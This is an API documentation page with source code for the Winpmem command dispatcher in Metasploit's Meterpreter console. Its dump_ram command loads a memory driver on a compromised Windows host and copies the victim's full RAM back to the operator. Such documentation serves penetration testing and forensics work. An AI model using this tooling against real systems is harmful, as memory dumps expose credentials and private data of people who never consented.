Class: Rex::Post::Meterpreter::Ui::Console::CommandDispatcher::Winpmem

Inherits:
Object
  • Object
show all
Includes:
Rex::Post::Meterpreter::Ui::Console::CommandDispatcher
Defined in:
lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb

Constant Summary collapse

Klass = 
Console::CommandDispatcher::Winpmem
WINPMEM_ERROR_SUCCESS = 
0
WINPMEM_ERROR_FAILED_LOAD_DRIVER = 
1
WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY = 
2
WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY = 
3
WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL = 
4
WINPMEM_ERROR_UNKNOWN = 
255

Instance Attribute Summary

Attributes included from Ui::Text::DispatcherShell::CommandDispatcher

#shell, #tab_complete_items

Instance Method Summary collapse

Methods included from Rex::Post::Meterpreter::Ui::Console::CommandDispatcher

check_hash, #client, #docs_dir, #filter_commands, #initialize, #log_error, #msf_loaded?, #session, set_hash, #unknown_command

Methods included from Msf::Ui::Console::CommandDispatcher::Session

#cmd_background, #cmd_background_help, #cmd_exit, #cmd_irb, #cmd_irb_help, #cmd_irb_tabs, #cmd_pry, #cmd_pry_help, #cmd_resource, #cmd_resource_help, #cmd_resource_tabs, #cmd_sessions, #cmd_sessions_help

Methods included from Ui::Text::DispatcherShell::CommandDispatcher

#cmd_help, #cmd_help_help, #cmd_help_tabs, #deprecated_cmd, #deprecated_commands, #deprecated_help, #docs_dir, #help_to_s, included, #initialize, #print, #print_error, #print_good, #print_line, #print_status, #print_warning, #tab_complete_directory, #tab_complete_filenames, #tab_complete_generic, #tab_complete_source_address, #unknown_command, #update_prompt

Instance Method Details

#cmd_dump_ram(*args) ⇒ Object 



38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb', line 38

def cmd_dump_ram(*args)
  unless args[0]
    print_error("Usage: dump_ram [output_file]")
    return
  end
  path_raw = args[0]

  fd = ::File.new(path_raw, 'wb+')
  memory_size, response_code, channel = client.winpmem.dump_ram
  case response_code
  when WINPMEM_ERROR_FAILED_LOAD_DRIVER
    print_error("Failed to load the driver")
    return true
  when WINPMEM_ERROR_FAILED_MEMORY_GEOMETRY
    print_error("Failed to get the memory geometry")
    return true
  when WINPMEM_ERROR_FAILED_ALLOCATE_MEMORY
    print_error("Failed to allocate memory")
    return true
  when WINPMEM_ERROR_FAILED_METERPRETER_CHANNEL
    print_error("Failed to open the meterpreter Channel")
    return true
  end
  print_good("Driver PMEM loaded successfully")
  #Arbitrary big buffer size, could be optimized
  buffer_size = 2 ** 17
  bytes_read = 0
  next_message_byte = memory_size / 10
  print_good("Dumping #{memory_size} bytes (press Ctrl-C to abort)")
  begin
    data = channel.read(buffer_size)
    until channel.eof || data.nil?
      fd.write(data)
      bytes_read += data.length
      data = channel.read(buffer_size)
      if bytes_read >= next_message_byte
        print_good(((next_message_byte.to_f / memory_size) * 100).round.to_s + "% Downloaded")
        next_message_byte += memory_size / 10
      end
    end
    print_status("Download completed")
  ensure
    print_status("Unloading driver")
    fd.close
    #Unload the driver on channel close
    channel.close
  end
  return true
end

#commandsObject

List of supported commands.



25
26
27
28
29
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb', line 25

def commands
  {
    'dump_ram' => 'Dump victim RAM',
  }
end

#nameObject

Name for this dispatcher



18
19
20
 
# File 'lib/rex/post/meterpreter/ui/console/command_dispatcher/winpmem.rb', line 18

def name
  'Winpmem'
end